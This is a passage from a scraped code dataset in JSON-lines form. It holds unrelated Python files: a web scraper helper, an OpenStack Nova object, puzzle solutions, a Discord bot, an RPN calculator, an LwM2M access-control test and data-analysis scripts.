'seller',\n        'block': 'div',\n        'class': 'media-user-name'\n    },\n    {\n        'name': 'item_name',\n        'block': 'div',\n        'class': 'tc-desc-text'\n    },\n    {\n        'name': 'amount',\n        'block': 'div',\n        'class': 'tc-amount',\n        'func': make_int\n    },\n    {\n        'name': 'price',\n        'block': 'div',\n        'class': 'tc-price',\n        'func': make_float\n    },\n    {\n        'name': 'online',\n        'block': 'div',\n        'class': 'online',\n        'func': make_bool\n    }\n]\n\n\ndef parse_info(link):\n    answer = requests.get(link)\n    if answer.status_code == HTTPStatus.OK:\n        logging.debug('Response received from the site')\n        soup = bs(answer.text, \"html.parser\")\n        items = soup.find_all('a', class_='tc-item')\n        data = []\n        if items:\n            logging.debug('Data sorted')\n            for item in items:\n                item_data = {}\n                for parse_classe in parse_classes:\n                    item_data[parse_classe['name']] = None\n                    info = item.find(parse_classe['block'],\n                                     class_=parse_classe['class'])\n                    if info:\n                        info = info.text.strip()\n                        if 'func' in parse_classe:\n                            info = parse_classe['func'](info)\n                        item_data[parse_classe['name']] = info\n                item_data['link'] = item['href']\n                data.append(item_data)\n            return data\n","repo_name":"oupsfed/funpay_bot","sub_path":"funpay_bot/core/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2026,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"71385834705","text":"'''Find all the palindromes in a list of words'''\nimport load_dictionary\n\ndef find_palindromes() -> list:\n    words = load_dictionary.load(\"words.txt\")\n    palindromes = []\n    for word in words:\n        # single letters aren't really 
palindromes\n if len(word) > 1 and word == word[::-1]:\n palindromes.append(word)\n print(f\"\\nNumber of palindromes found = {len(palindromes)}\\n\")\n print(*palindromes, sep='\\n')\n return palindromes\n","repo_name":"adubois85/python_projects","sub_path":"impractical_python/chapter_02/palindromes.py","file_name":"palindromes.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28561358617","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom oslo_config import cfg\nfrom oslo_log import log as logging\nfrom oslo_serialization import jsonutils\nimport six\nfrom sqlalchemy.orm import joinedload\n\nfrom nova.db.sqlalchemy import api as db\nfrom nova.db.sqlalchemy import api_models\nfrom nova import exception\nfrom nova.i18n import _LE\nfrom nova import objects\nfrom nova.objects import base\nfrom nova.objects import fields\n\nCONF = cfg.CONF\nLOG = logging.getLogger(__name__)\n\nOBJECT_FIELDS = ['info_cache', 'security_groups']\nJSON_FIELDS = ['instance_metadata']\nIP_FIELDS = ['access_ip_v4', 'access_ip_v6']\n\n\n@base.NovaObjectRegistry.register\nclass BuildRequest(base.NovaObject):\n # Version 1.0: Initial version\n VERSION = '1.0'\n\n fields = {\n 'id': fields.IntegerField(),\n 'project_id': fields.StringField(),\n 'user_id': fields.StringField(),\n 'display_name': fields.StringField(nullable=True),\n 'instance_metadata': fields.DictOfStringsField(nullable=True),\n 'progress': fields.IntegerField(nullable=True),\n 'vm_state': fields.StringField(nullable=True),\n 'task_state': fields.StringField(nullable=True),\n 'image_ref': fields.StringField(nullable=True),\n 'access_ip_v4': fields.IPV4AddressField(nullable=True),\n 'access_ip_v6': fields.IPV6AddressField(nullable=True),\n 'info_cache': fields.ObjectField('InstanceInfoCache', nullable=True),\n 'security_groups': fields.ObjectField('SecurityGroupList'),\n 'config_drive': fields.BooleanField(default=False),\n 'key_name': fields.StringField(nullable=True),\n 'locked_by': fields.EnumField(['owner', 'admin'], nullable=True),\n 'request_spec': fields.ObjectField('RequestSpec'),\n # NOTE(alaski): Normally these would come from the NovaPersistentObject\n # mixin but they're being set explicitly because we only need\n # created_at/updated_at. 
There is no soft delete for this object.\n # These fields should be carried over to the instance when it is\n # scheduled and created in a cell database.\n 'created_at': fields.DateTimeField(nullable=True),\n 'updated_at': fields.DateTimeField(nullable=True),\n }\n\n def _load_request_spec(self, db_spec):\n self.request_spec = objects.RequestSpec._from_db_object(self._context,\n objects.RequestSpec(), db_spec)\n\n def _load_info_cache(self, db_info_cache):\n self.info_cache = objects.InstanceInfoCache.obj_from_primitive(\n jsonutils.loads(db_info_cache))\n\n def _load_security_groups(self, db_sec_group):\n self.security_groups = objects.SecurityGroupList.obj_from_primitive(\n jsonutils.loads(db_sec_group))\n\n @staticmethod\n def _from_db_object(context, req, db_req):\n for key in req.fields:\n if isinstance(req.fields[key], fields.ObjectField):\n try:\n getattr(req, '_load_%s' % key)(db_req[key])\n except AttributeError:\n LOG.exception(_LE('No load handler for %s'), key)\n elif key in JSON_FIELDS and db_req[key] is not None:\n setattr(req, key, jsonutils.loads(db_req[key]))\n else:\n setattr(req, key, db_req[key])\n req.obj_reset_changes()\n req._context = context\n return req\n\n @staticmethod\n @db.api_context_manager.reader\n def _get_by_instance_uuid_from_db(context, instance_uuid):\n db_req = (context.session.query(api_models.BuildRequest)\n .options(joinedload('request_spec'))\n .filter(\n api_models.RequestSpec.instance_uuid == instance_uuid)\n ).first()\n if not db_req:\n raise exception.BuildRequestNotFound(uuid=instance_uuid)\n return db_req\n\n @base.remotable_classmethod\n def get_by_instance_uuid(cls, context, instance_uuid):\n db_req = cls._get_by_instance_uuid_from_db(context, instance_uuid)\n return cls._from_db_object(context, cls(), db_req)\n\n @staticmethod\n @db.api_context_manager.writer\n def _create_in_db(context, updates):\n db_req = api_models.BuildRequest()\n db_req.update(updates)\n db_req.save(context.session)\n # NOTE: This is done because a later access will trigger a lazy load\n # outside of the db session so it will fail. 
We don't lazy load\n # request_spec on the object later because we never need a BuildRequest\n # without the RequestSpec.\n db_req.request_spec\n return db_req\n\n def _get_update_primitives(self):\n updates = self.obj_get_changes()\n for key, value in six.iteritems(updates):\n if key in OBJECT_FIELDS and value is not None:\n updates[key] = jsonutils.dumps(value.obj_to_primitive())\n elif key in JSON_FIELDS and value is not None:\n updates[key] = jsonutils.dumps(value)\n elif key in IP_FIELDS and value is not None:\n # These are stored as a string in the db and must be converted\n updates[key] = str(value)\n req_spec_obj = updates.pop('request_spec', None)\n if req_spec_obj:\n updates['request_spec_id'] = req_spec_obj.id\n return updates\n\n @base.remotable\n def create(self):\n if self.obj_attr_is_set('id'):\n raise exception.ObjectActionError(action='create',\n reason='already created')\n\n updates = self._get_update_primitives()\n db_req = self._create_in_db(self._context, updates)\n self._from_db_object(self._context, self, db_req)\n\n @staticmethod\n @db.api_context_manager.writer\n def _destroy_in_db(context, id):\n context.session.query(api_models.BuildRequest).filter_by(\n id=id).delete()\n\n @base.remotable\n def destroy(self):\n self._destroy_in_db(self._context, self.id)\n","repo_name":"BU-NU-CLOUD-SP16/Trusted-Platform-Module-nova","sub_path":"nova/objects/build_request.py","file_name":"build_request.py","file_ext":"py","file_size_in_byte":6500,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"48"} +{"seq_id":"39997923283","text":"'''\nPandigital prime\nProblem 41\nWe shall say that an n-digit number is pandigital if it makes use of all the digits 1 to n exactly once. For example, 2143 is a 4-digit pandigital and is also prime.\n\nWhat is the largest n-digit pandigital prime that exists? '''\n\nfrom math import sqrt\n\nmaxp = 0\nprimes = [2, 3, 5, 7]\n\n\ndef gen_all(a):\n p = []\n\n if a == 2:\n return ['12', '21']\n s = str(a)\n pp = gen_all(a - 1)\n for i in pp:\n for j in range(a):\n pi = i[:j] + s + i[j:]\n p.append(pi)\n return p\n\n\ndef gen_pand_pc(a):\n p = []\n if a > 9:\n return p\n n = int(a * (a + 1) / 2)\n if n % 3 == 0:\n return p\n s = str(a)\n #li = list(range(a,0,-1))\n pp = gen_all(a - 1)\n for i in pp:\n for j in range(a):\n pi = i[:j] + s + i[j:]\n if pi[-1] not in ['2', '4', '5', '6', '8']:\n p.append(int(pi))\n return p\n\n\ndef is_prime(a):\n b = int(sqrt(a)) + 1\n for p in primes:\n if a % p == 0:\n return False\n break\n if p > b:\n return True\n return True\n\n\nmaxi = 7654321\nlim = int(sqrt(maxi)) + 1\n\nfor i in range(9, lim, 2):\n if is_prime(i):\n primes.append(i)\n\nprint(\"Step one complete . # = \", len(primes))\n\np = gen_pand_pc(7)\nprint(\"all comb for 7 generated , # =\", len(p))\n\nfor i in p:\n ii = int(i)\n if is_prime(ii):\n maxp = max(ii, maxp)\n # print(ii)\nprint(\"Final = \", maxp)\n\n# print(gen_all(3))\n","repo_name":"murli777/Project-Euler-Solutions","sub_path":"src/001-050/P041-Panigital_Prime.py","file_name":"P041-Panigital_Prime.py","file_ext":"py","file_size_in_byte":1490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7059257811","text":"import discord\nimport random\n\ncolor= 0xAD91FF\n\ndef intro():\n message=\"\"\"\n Meow! \n Welcome, welcome! I'm Weather Cat, and I'm here to make your day a whole lot better! 
With my expertise in weather forecasting, you'll never have to worry about stepping out unprepared for the elements. I'll let you know if it's going to be a sunny day, a rainy one, or if you need to pack an umbrella and some boots.\n\n But that's not all I can do! I'm also an expert in **air quality index prediction**, so you can always breathe easy knowing you're getting accurate information about the air you're breathing.\n\n And if you ever find yourself feeling lonely or in need of some company, don't worry, because I'm always here for you. My **Cat GPT integration** means we can have a chat anytime you want!\n\n So, let's make your day purr-fect together! With Weather Cat by your side, you'll always be prepared for whatever the day brings, and you'll never be alone.\n \"\"\"\n \n return discord.Embed(\n title='Hello friend',\n description=message,\n color=color\n )\n \ndef gpt():\n choice=[\n \"https://media.tenor.com/7JbbkdTGA38AAAAS/cute-cat.gif\",\n \"https://media.tenor.com/pONKfKjvep4AAAAS/cat-shocked.gif\",\n \"https://media.tenor.com/PS9Tcg6mIY4AAAAS/cat-ayasan.gif\",\n \"https://media.tenor.com/Ro5LGkOGGS0AAAAC/cat-catdriving.gif\",\n \"https://media.tenor.com/fWXyb86dSWMAAAAC/ok-cat.gif\",\n \"https://media.tenor.com/cNJNNhr8LQMAAAAM/cutecat-cute.gif\",\n \"https://media.tenor.com/cNJNNhr8LQMAAAAM/cutecat-cute.gif\",\n \"https://media.tenor.com/z0quuGfwH8AAAAAM/cat-sad.gif\"\n \"https://media.tenor.com/1SMrekR7KgQAAAAM/cat-angry.gif\",\n \"https://media.tenor.com/jMlNorWmapUAAAAS/echonomical-echosystem.gif\",\n \"https://media.tenor.com/ngXBmaiDqssAAAAS/cat-kitty.gif\",\n \"https://media.tenor.com/ngXBmaiDqssAAAAS/cat-kitty.gif\",\n \"https://media.tenor.com/ngXBmaiDqssAAAAS/cat-kitty.gif\",\n \"https://media.tenor.com/ngXBmaiDqssAAAAS/cat-kitty.gif\",\n \"https://media.tenor.com/ngXBmaiDqssAAAAS/cat-kitty.gif\",\n \"https://media.tenor.com/lPuo1Txt2vEAAAAS/huh-scare.gif\"\n ]\n return [\"meow \"*random.randint(5,50), choice[random.randint(0,len(choice)-1)]]\n\ndef helpM():\n message= discord.Embed(\n title='Cat\\'s here to help',\n color=color\n )\n message.add_field(\n name=\"Prefix\",\n value=\"`!cat`\",\n inline=False\n )\n message.add_field(\n name=\"About Me\",\n value=\"`hi`\",\n inline=True\n )\n message.add_field(\n name=\"Help!\",\n value=\"`help`\",\n inline=True\n )\n message.add_field(\n name=\"Weather Condition\",\n value=\"`weather`\",\n inline=False\n )\n message.add_field(\n name=\"Air Quality Index\",\n value=\"`AQI`\",\n inline=True\n )\n message.add_field(\n name=\"Plan My Trip\",\n value=\"`PMT`\",\n inline=True\n )\n message.add_field(\n name=\"Cat GPT\",\n value=\"`gpt`\",\n inline=False\n )\n \n return message\n\n\ndef help(message):\n if(message.lower()==\"hi\"):\n message=discord.embeds(\n title=message.title(),\n desciption=\"\"\"\n You can learn more about me with this command!\n usage: `!cat hi`\n \"\"\",\n color=color\n )\n return message\n elif(message.lower()==\"help\"):\n return discord.embeds(\n title=message.title(),\n desciption=\"\"\"\n learn about all the commands!\n usage: `!cat help [command name](optional)`\n \"\"\",\n color=color\n )\n elif(message.lower()==\"weather\"):\n return discord.embeds(\n title=message.title(),\n desciption=\"\"\"\n Current weather condition and more!\n usage: `!cat weather [Place Name]`\n \"\"\",\n color=color\n )\n elif(message.lower()==\"AQI\"):\n return discord.embeds(\n title=message.title(),\n desciption=\"\"\"\n learn about current Air Quality Index!\n usage: `!cat aqi [place name]`\n \"\"\",\n 
color=color\n )\n elif(message.lower()==\"pmt\"):\n return discord.embeds(\n title=message.title(),\n desciption=\"\"\"\n within the next 7 days, let me check if the date is good for your event!\n usage: `!cat pmt [DD-MM]`\n \"\"\",\n color=color\n )\n elif(message.lower()==\"gpt\"):\n return discord.embeds(\n title=message.title(),\n desciption=\"\"\"\n The most advanced version of CAT GPT!\n usage: `!cat gpt [your question]`\n \"\"\",\n color=color\n )\n else:\n return discord.embeds(\n title=message.title(),\n desciption=\"\"\"\n Sorry didn't understand that command.\n Use `help` to get list of all commands.\n \"\"\",\n color=color\n )","repo_name":"D3FaltXD/Weather-Cat","sub_path":"messages.py","file_name":"messages.py","file_ext":"py","file_size_in_byte":5125,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"6264029311","text":"#!/usr/bin/env python3\n# a reverse polish notation calculator\n# for more info, see github.com/qguv/rpcalc\n\nimport math\nfrom rpcalc.stack import Stack\nfrom rpcalc.inout import clear\n\n# Getch operations\nfrom rpcalc.inout import getch as rawGetch\ndef getch():\n rawChar = rawGetch()\n if rawChar == 'Q': # naive escape\n clear()\n print(\"bye.\")\n exit()\n else:\n inpChar = rawChar\n return inpChar\n\n# operator management functions\nimport rpcalc.operators as ops\n\ndef getArgReq(symbol):\n return ops.bindings[symbol][1]\n\ndef operate(symbol, stack):\n '''\n Takes a symbol and a stack, performs the associated\n operation on the stack, and returns any errors.\n '''\n if stack.canOperate(getArgReq(symbol)):\n fn = ops.bindings[symbol][0] # get operation fn name\n try:\n return fn(stack) # absolute magic\n except (OverflowError, KeyboardInterrupt):\n return \"answer too large to compute!\"\n else:\n return \"too few entries for \" + symbol + \"!\"\n\ndef isNum(string):\n '''\n Tests whether a string can be converted to a float.\n Output is boolean.\n '''\n try:\n null = float(string)\n except ValueError:\n return False\n else:\n return True\n\ndef showCalc(stack, buf, errors):\n '''\n If there are errors, display those.\n Then show the \"screen\" of the calculator.\n '''\n clear()\n nonErrors = { '', None, '\\n' }\n if errors not in nonErrors:\n print(errors)\n stack.rpnView(buf) # correct view for HP calcs\n\ndef showStack(stack, buf):\n clear()\n try:\n print(stack)\n except KeyboardInterrupt:\n clear()\n print('too large to display!')\n stack.rpnView(buf)\n\ndef operHandler(stack, buf):\n operBuf = buf[-1] # initialize operator buffer\n buf = buf[:-1] # only keep numbers in buffer now\n while operBuf not in ops.bindings.keys(): # side loop\n operBuf += getch()\n if (operBuf[0] == 'e') and (operBuf[-1] in \\\n {str(i) for i in range(10)} | {\"+\",\"-\"}):\n # if e is being used as a power of ten handler\n buf = buf + operBuf # reunite buffer and move on\n operBuf = ''\n return (buf,'',False)\n if not any(operBuf in s for s in ops.bindings.keys()):\n if len(buf) != 0: # if there are any numbers to enter\n stack.push(float(buf))\n operBuf = ''\n return ('','not an operator! type ? 
for help.',False)\n else:\n if len(buf) != 0: # if there are any numbers to enter\n stack.push(float(buf))\n newErrors = operate(operBuf, stack)\n operBuf = ''\n if newErrors is None:\n return ('','',False)\n else:\n return ('',newErrors,False)\n\ndef keyHandler(stack, buf, errors):\n '''\n A series of tests for the most recent buffer entry.\n Keys tested are: return, backspace, p\n Sequences tested are: operators, numbers\n '''\n if buf[-1] == '\\r': # return\n if len(buf) == 1: # if there aren't any numbers to enter\n if len(stack) != 0: # if there is an x\n ops.DupX(stack) # duplicate x\n return ('','',False)\n else:\n stack.push(float(0))\n return ('','',False)\n else: # put number in stack\n try:\n stack.push(float(buf[:-1]))\n except (TypeError, ValueError):\n return ('',\"not a number!\",False)\n else:\n return ('','',False)\n elif ( buf[-1] == '\\x08' ) or \\\n ( buf[-1] == '\\x7f' ) or \\\n ( buf[-1] == '\\b' ): # handling backspace\n return (buf[:-2],'',False)\n elif buf == 'p': # Special \"print\" operator\n return ('','',True)\n elif any( s.startswith(buf[-1]) for s in ops.bindings.keys() ):\n # character just inserted is at least a partial operator\n return operHandler(stack, buf)\n elif (buf[-1] == 'e') and (not isNum(buf[:-1])):\n return ('','not an operator! type ? for help.',False)\n elif buf[-1] not in ({str(i) for i in range(10)} | {\".\",\"e\"}):\n return ('','not an operator! type ? for help.',False)\n else:\n return (buf,'',False)\n\n# the big guns\ndef workLoop(stack, buf, errors, printFlag): # fifth re-write!\n '''\n Runs the main loop for an individual stack.\n Stack-switching can be implemented in the future with another\n function which is called by main() and calls this function.\n '''\n while True:\n if printFlag: #TODO: this is really ugly\n # replaces normal print with a view of the stack\n showStack(stack, buf)\n printFlag = False\n else:\n showCalc(stack, buf, errors)\n errors = ''\n buf += getch() # reads input from user without enter key\n buf, errors, printFlag = keyHandler(stack, buf, errors)\n\n# DO IT #\nif __name__ == \"__main__\":\n stack = Stack([], 'stack view', limit=limit)\n buf, errors, printFlag = '', '', False\n if values:\n for n in values:\n stack.push(n)\n workLoop(stack, buf, errors, printFlag)\n","repo_name":"qguv/rpcalc","sub_path":"rpcalc/rpn.py","file_name":"rpn.py","file_ext":"py","file_size_in_byte":5288,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"12089081739","text":"from framework.lwm2m.tlv import TLVType\nfrom framework.lwm2m_test import *\n\n\nclass SecurityObjectDmOperationsBySingleServer(test_suite.Lwm2mSingleServerTest,\n test_suite.Lwm2mDmOperations):\n def runTest(self):\n # Every security instance action on nonexistent instance shall return NOT_AUTHORIZED to not disclose\n # any information.\n for i in range(3):\n self.read_instance(server=self.serv, oid=OID.Security, iid=i,\n expect_error_code=coap.Code.RES_UNAUTHORIZED)\n self.delete_instance(server=self.serv, oid=OID.Security, iid=i,\n expect_error_code=coap.Code.RES_UNAUTHORIZED)\n self.write_instance(server=self.serv, oid=OID.Security, iid=i,\n expect_error_code=coap.Code.RES_UNAUTHORIZED)\n self.execute_resource(server=self.serv, oid=OID.Security, iid=i, rid=1,\n expect_error_code=coap.Code.RES_UNAUTHORIZED)\n self.write_attributes(server=self.serv, oid=OID.Security, iid=i, rid=1,\n query=['pmax=1'], 
expect_error_code=coap.Code.RES_UNAUTHORIZED)\n\n\n","repo_name":"ETCorp/morpheus-examples","sub_path":"Anjay/test/integration/suites/default/security.py","file_name":"security.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32412080095","text":"import MySQLdb\nimport MySQLdb.cursors as cursors\nimport pandas\n\nfrom data.objects import DataFrame, DataPool\n\n\nclass Connector(object):\n rep = None\n cfg_mysql = None\n conn = None\n\n def __init__(self, replacement):\n self.rep = replacement\n self.cfg_mysql = replacement\n\n def open_conn(self):\n self.conn = MySQLdb.connect(host=self.cfg_mysql['host'],\n port=self.cfg_mysql['port'],\n user=self.cfg_mysql['user'],\n passwd=self.cfg_mysql['password'],\n db=self.cfg_mysql['database'],\n cursorclass=cursors.SSCursor)\n\n def close_conn(self):\n self.conn.close()\n\n def get_feature_ids(self, selected_feature_table):\n cursor = self.conn.cursor()\n\n sql = \"SELECT DISTINCT(feature_id) AS id, \" \\\n \"(SELECT feature_name FROM {0}.feature_info WHERE {0}.feature_info.feature_id = id)\" \\\n \"FROM {0}.{1} WHERE feature_id > 1\" \\\n .format(self.cfg_mysql['database'], selected_feature_table)\n cursor.execute(sql)\n data = cursor.fetchall()\n feature_id_frame = DataFrame(data, ['feature_id', 'feature_name'])\n cursor.close()\n self.conn.commit()\n return feature_id_frame\n\n def save_feature_frame(self, selected_feature_table, selected_feature_ids, selected_feature_names):\n frame_pool = DataPool()\n frames = []\n keys = ['user_id', 'feature_week']\n for i in range(len(selected_feature_ids)):\n cursor = self.conn.cursor()\n feature_description = '[{}] {}'.format(str(selected_feature_ids[i]).zfill(3), selected_feature_names[i])\n sql = \"SELECT user_id, feature_week, feature_value FROM {0}.{1} WHERE feature_id = {2}\" \\\n .format(self.cfg_mysql['database'], selected_feature_table, selected_feature_ids[i])\n cursor.execute(sql)\n data = cursor.fetchall()\n feature_frame = DataFrame(data, keys + [feature_description])\n frames.append(feature_frame)\n cursor.close()\n matched = frames[0]\n for i in range(1, len(frames)):\n matched = pandas.merge(matched, frames[i], on=keys, how='outer')\n matched = DataFrame(frame=matched)\n cursor = self.conn.cursor()\n sql = \"SELECT user_id, feature_week, feature_value FROM {0}.{1} WHERE feature_id = 1\" \\\n .format(self.cfg_mysql['database'], selected_feature_table)\n cursor.execute(sql)\n data = cursor.fetchall()\n dropout_frame = DataFrame(data, keys + ['dropout'])\n cursor.close()\n matched = pandas.merge(matched, dropout_frame, on=keys, how='right')\n matched = DataFrame(frame=matched)\n frame_pool.save(matched)\n self.conn.commit()\n return True\n","repo_name":"MOOC-Learner-Project/MOOC-Learner-Modeled","sub_path":"data/connector.py","file_name":"connector.py","file_ext":"py","file_size_in_byte":2924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16652279467","text":"import os\nimport os.path as osp\nfrom vectorrvnn.trainutils import Options\n\ndef test_options () :\n chdir = osp.split(osp.abspath(__file__))[0]\n opts = Options().parse(testing=[\n '--dataroot',\n osp.join(\n chdir,\n '../../data/Toy'\n ),\n '--name', \n 'test',\n '--n_epochs',\n '1',\n '--batch_size',\n '64',\n '--raster_size',\n '128',\n '--train_epoch_length',\n '256',\n '--val_epoch_length',\n '256'\n ])\n assert 
True\n","repo_name":"Vrroom/vectorrvnn","sub_path":"tests/trainutils/test_options.py","file_name":"test_options.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"38558665602","text":"\n\nclass Coords:\n x = 0\n y = 0\n\n def __init__(self, x, y):\n self.x = int(x)\n self.y = int(y)\n\n def __eq__(self, other):\n return self.x == other.x and self.y == other.y\n\n def __hash__(self):\n return hash(tuple([self.x, self.y]))\n\n\ndef _process_current_sentence(sentence: dict):\n if sentence:\n pairwise_agr = []\n pairwise_list = list(zip(list(sentence.keys()), list(sentence.keys())[1:]))\n for team1, team2 in pairwise_list:\n overlap_count = len(sentence[team1].intersection(sentence[team2]))\n union_count = len(sentence[team1].union(sentence[team2]))\n pairwise_agr.append(overlap_count / float(union_count))\n pairs_len = len(pairwise_agr)\n if pairs_len == 0:\n return None\n else:\n return sum(pairwise_agr) / pairs_len\n else:\n return None\n\n\nif __name__ == \"__main__\":\n agreement = []\n sentence_count = 0\n # with open('./data/test.m2', 'r') as inp:\n with open('./data/official-2014.combined-withalt.m2', 'r') as inp:\n lines = [line.rstrip('\\n') for line in inp]\n current_sentence = dict()\n for line in lines:\n if line:\n if line[0] == 'S':\n sentence_count += 1\n current_agreement = _process_current_sentence(current_sentence)\n agreement.append(current_agreement)\n current_sentence = dict()\n if line[0] == 'A':\n team_id = line[-1]\n line = line.split()\n coords = Coords(line[1], line[2].split('|||')[0])\n if current_sentence.get(team_id):\n current_sentence[team_id].add(coords)\n else:\n current_sentence[team_id] = {coords}\n agreement = [a for a in agreement if a is not None]\n annotated_sentences = len(agreement)\n print(annotated_sentences)\n avg_agreement = sum(agreement) / float(len(agreement))\n print(avg_agreement)\n","repo_name":"serge-sotnyk/prj-nlp-2019","sub_path":"students/leonid.chashnikov/03-data/2_2_inter_annotator_agreement_pairs.py","file_name":"2_2_inter_annotator_agreement_pairs.py","file_ext":"py","file_size_in_byte":2091,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"71466085905","text":"import numpy as np\nfrom matplotlib import pyplot as plt\nfrom sklearn.metrics import classification_report\nfrom sklearn.model_selection import GridSearchCV, validation_curve, learning_curve, RepeatedStratifiedKFold\nfrom sklearn.neighbors import KNeighborsClassifier\n\n\nclass KNN:\n def __init__(self, x_train, x_test, y_train, y_test):\n self.knn = KNeighborsClassifier()\n self.x_train = x_train\n self.x_test = x_test\n self.y_train = y_train\n self.y_test = y_test\n\n def evaluation_model(self, seed):\n self.knn.fit(self.x_train, self.y_train)\n param_grid = dict(n_neighbors=list(range(1, 100)))\n\n cv = RepeatedStratifiedKFold(n_splits=5, n_repeats=5, random_state=seed)\n grid = GridSearchCV(self.knn, param_grid, cv=cv, scoring=\"accuracy\", error_score=0)\n grid.fit(self.x_train, self.y_train)\n best_model: KNeighborsClassifier = self.knn.set_params(**grid.best_params_)\n\n parameter_range = np.arange(1, 30, 1)\n\n X = np.concatenate((self.x_train, self.x_test), axis=0)\n y = np.concatenate((self.y_train, self.y_test))\n\n score, train_scores, valid_scores = learning_curve(estimator=best_model,\n X=X, y=y,\n scoring='accuracy')\n\n mean_train_score = np.mean(train_scores, axis=1)\n\n mean_valuation_score = 
np.mean(valid_scores, axis=1)\n\n plt.title('curva di apprendimento')\n plt.plot(score, mean_train_score,\n marker='o', markersize=5,\n color='black', label='Training Accuracy')\n plt.plot(score, mean_valuation_score,\n marker='o', markersize=5,\n color='green', label='Validation Accuracy')\n plt.ylabel('Accuracy')\n plt.grid()\n plt.show()\n\n train_scores, valid_scores = validation_curve(estimator=best_model,\n X=self.x_train, y=self.y_train,\n param_name='n_neighbors',\n param_range=parameter_range,\n scoring='accuracy',\n n_jobs=-1)\n mean_train_score = np.mean(train_scores, axis=1)\n\n mean_valuation_score = np.mean(valid_scores, axis=1)\n\n plt.title('curva di validazione')\n\n plt.plot(parameter_range, mean_train_score,\n marker='o', markersize=5,\n color='black', label='Training Accuracy')\n plt.plot(parameter_range, mean_valuation_score,\n marker='o', markersize=5,\n color='green', label='Validation Accuracy')\n plt.xlabel('n neighbors')\n plt.ylabel('Accuracy')\n plt.grid()\n plt.show()\n\n best_model.fit(self.x_train, self.y_train)\n y_pred = best_model.predict(self.x_test)\n\n print(\"REPORT DEL MIGLIORE MODELLO KNN TROVATO\")\n print(classification_report(y_pred, self.y_test))\n\n\n\n\n","repo_name":"VitoNicolaLosavio/Icon-2022-23","sub_path":"Models/KNN.py","file_name":"KNN.py","file_ext":"py","file_size_in_byte":3140,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"73354017426","text":"from typing import List\n\n\nclass Solution:\n def findMedianSortedArrays(self, nums1: List[int], nums2: List[int]) -> float:\n l1 = len(nums1)\n l2 = len(nums2)\n i, j = 0, 0\n new_arr = []\n while i < l1 or j < l2:\n if i < l1 and j < l2 and nums1[i] < nums2[j] or i < l1 and not j < l2:\n new_arr.append(nums1[i])\n i += 1\n elif j < l2:\n new_arr.append(nums2[j])\n j += 1\n l3 = l1 + l2\n mid = l3 // 2\n if l3 % 2 != 0:\n arr = new_arr[mid: mid + 1]\n else:\n arr = new_arr[mid - 1: mid + 1]\n return sum(arr) / len(arr)\n\nc = Solution()\n\nprint(c.findMedianSortedArrays([1, 5, 15], [8, 26, 37]))","repo_name":"cetinca/study","sub_path":"algos/median_of_sorted_arrays.py","file_name":"median_of_sorted_arrays.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38645057639","text":"import re\nclass OutputParser:\n #input: the metamap output text file\n def __init__(self,input):\n self.input=input\n\n #get the umls ids from metamap output file\n def extract_umls_id(self):\n ids={}\n for line in open(self.input):\n if re.search(\"^Processing\",line):\n continue\n if re.search(\"^Meta Mapping\",line):\n continue\n id=line.split(\":\")[0].split()[-1]\n ids[id]=0\n return ids.keys()\n","repo_name":"gangcai/pymetamap","sub_path":"parse_metamap_output.py","file_name":"parse_metamap_output.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11440154152","text":"def most_common(bin_list, index):\n if [binary[i] for binary in bin_list].count('1') >= len(bin_list) / 2:\n return '1'\n else:\n return '0'\n\n\nwith open('../inputs/AoC2021-03.txt', 'r') as file:\n bin_nb_list = [line.strip() for line in file]\n\noxygen, co2 = bin_nb_list.copy(), bin_nb_list.copy()\n\ni = 0\nwhile len(oxygen) > 1 or len(co2) > 1:\n ox_rating = most_common(oxygen, i)\n co2_rating = '1' if most_common(co2, i) == '0' else '0'\n oxygen = list(filter(lambda nb: nb[i] == 
